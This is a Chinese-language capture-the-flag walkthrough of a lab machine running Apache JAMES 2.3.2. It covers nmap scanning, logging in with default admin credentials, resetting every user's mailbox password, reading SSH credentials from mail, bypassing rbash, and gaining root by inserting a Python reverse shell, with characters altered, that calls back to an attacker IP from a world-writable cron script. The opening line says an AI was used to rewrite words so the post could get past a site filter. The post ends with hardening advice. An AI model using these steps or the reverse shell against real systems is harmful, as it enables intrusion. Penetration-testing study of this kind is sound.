一直发不出来403,使用克劳德替换敏感字符后,终于发出来了,我也不知道它替换了什么,可能机器更懂机器
一、信息收集
端口扫描
首先进行全端口快速扫描,找出所有开放的端口:
nmap -sT -min-rate 10000 -p- 10.10.10[.]51
扫描结果显示目标主机开放了7个端口:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 00:56 CST
Warning: 10.10.10.51 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.51 (10.10.10.51)
Host is up (0.15s latency).
Not shown: 63596 closed tcp ports (conn-refused), 1932 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip
Nmap done: 1 IP address (1 host up) scanned in 31.29 seconds
接着对这些端口进行详细扫描,收集服务版本和配置信息:
nmap -sT -sC -sV -O -p22,25,53,80,110,119,4555 10.10.10[.]51 -oA so.txt
详细扫描结果:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 01:08 CST
Stats: 0:01:07 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 76.79% done; ETC: 01:09 (0:00:00 remaining)
Nmap scan report for 10.10.10.51 (10.10.10.51)
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello 10.10.10.51 (10.10.14.16 [10.10.14.16])
53/tcp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Apache httpd 2.4.25 ((Debian))
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=3/31%Time=67E97A9F%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x02\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.48 seconds
服务分析
从扫描结果中,我们发现了几个关键点:
- 目标主机使用Debian Linux系统
- 端口22运行SSH服务
- 端口25、110、119和4555运行的是Apache JAMES邮件服务的各个组件
- 特别值得注意的是4555端口上运行着JAMES Remote Admin 2.3.2服务
这里重点关注4555端口,JAMES Remote Admin 2.3.2这个服务很少见,而且版本号很低,大概率存在漏洞。根据开放的端口组合分析,突破口很可能在邮件服务方面。
二、初步突破
利用JAMES管理接口
通过Google搜索,发现JAMES Remote Admin服务的默认登录凭据是root/root。尝试使用nc连接该服务:
nc 10.10.10[.]51 4555
连接成功,并使用默认凭据登录:
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
查看可用命令:
HELP
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
使用listusers命令列出系统中存在的用户:
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
利用setpassword命令修改所有用户的密码为111:
setpassword james 111
Password for james reset
setpassword thomas 111
Password for thomas reset
setpassword john 111
Password for john reset
setpassword mindy 111
Password for mindy reset
setpassword mailadmin 111
Password for mailadmin reset
quit
Bye
访问用户邮箱
修改密码后,我们可以通过POP3协议登录用户邮箱查看邮件:
telnet 10.10.10[.]51 110
首先尝试登录james用户:
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
user james
pass 111
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
+OK
+OK Welcome james
list
+OK 0 0
.
Connection closed by foreign host.
james用户邮箱为空,继续检查其他用户。最终在mindy用户的邮箱中发现了有价值的信息:
user mindy
pass 111
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
mindy用户有两封邮件,查看第一封:
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
查看第二封邮件:
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.
三、获取用户权限
在第二封邮件中,我们找到了mindy用户的SSH登录凭据:
- 用户名:mindy
- 密码:P@55W0rd1!2@
使用这些凭据进行SSH登录:
ssh [email protected][.]51
登录成功,获得shell:
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$
查看用户目录,获取user.txt:
mindy@solidstate:~$ ls
bin user.txt
mindy@solidstate:~$ cat user.txt
ee16745xxxxxxxxxxxxxxxxxxxxxxxxxx
尝试执行cd命令遇到限制:
mindy@solidstate:~$ cd /
-rbash: cd: restricted
发现用户被限制在rbash环境中,需要绕过这个限制。
绕过rbash限制
使用sshpass工具并指定-t选项强制执行普通bash:
sshpass -p 'P@ssw0rd1!2@' ssh [email protected][.]51 -t bash
成功绕过rbash限制,获得完整的shell权限。
四、权限提升
现在我们可以自由地在系统中查找可能的提权向量。
在/opt目录下发现一个权限为777的Python脚本:
ls -la /opt
查看脚本内容,发现它会定期删除/tmp目录下的文件,看起来是一个定时任务:
#!/usr/bin/env python
import os, sys
try:
for filename in os.listdir("/tmp"):
if not filename.startswith(".."):
os.remove("/tmp/" + filename)
except:
pass
为了验证这个脚本是否由定时任务执行,在/tmp目录下创建一个测试文件,观察它是否会被删除。一分钟后测试文件确实被删除了,证实该脚本通过定时任务运行,且很可能以root权限执行。
利用定时任务获取root权限
利用这个发现,我们可以修改该Python脚本,插入反向连接代码:
#!/usr/bin/env python
import s0cket,0s,pt_y;s=s0cket.s0cket(s0cket.AF_INET,s0cket.SOCK_STREAM);s.c0nnect(("10.10.16[.]14",9999));0s.dup2(s.filen0(),0);0s.dup2(s.filen0(),1);0s.dup2(s.filen0(),2);pt_y.spawn("/bin/sh")
然后在本地设置监听器:
nc -lvnp [port]
等待几分钟后,脚本被定时任务执行,我们成功获得root权限的反弹shell。
获取root.txt:
cd /root
cat root.txt
五、攻击总结
本次安全评估的主要步骤:
- 端口扫描发现目标系统运行多个服务,特别是JAMES邮件服务
- 利用JAMES Remote Admin的默认凭据获取管理权限
- 重置系统用户邮箱密码,从邮件中获取SSH登录凭据
- 使用SSH凭据登录系统,获取用户权限
- 绕过rbash限制,获得完整shell
- 发现并利用权限为777的定时任务脚本,获取root权限
六、安全建议
针对此次渗透测试中发现的漏洞,建议采取以下安全措施:
- 修改所有默认凭据,特别是管理接口的登录凭据
- 避免在邮件中明文传输敏感信息,如登录凭据
- 正确配置rbash环境,防止简单绕过
- 按照最小权限原则设置文件权限,避免将关键系统文件设为777
- 定时任务应使用最低必要权限运行,而非root权限
- 定期更新系统和应用程序,修补已知漏洞
- 实施入侵检测系统,监控异常活动
通过解决这些安全问题,可以显著提高系统的安全性,防止类似的攻击。
七、漏洞利用路径总结
端口扫描 → 服务识别 → 默认凭据利用 → 邮件信息收集 → SSH凭据获取 → rbash绕过 → 权限提升
NMAP发现JAMES邮件服务 → 利用JAMES Admin默认root/root凭据 → 重置用户邮箱密码 → 获取mindy的SSH凭据 → 绕过rbash限制获取完整shell → 利用777权限定时任务脚本获取root权限
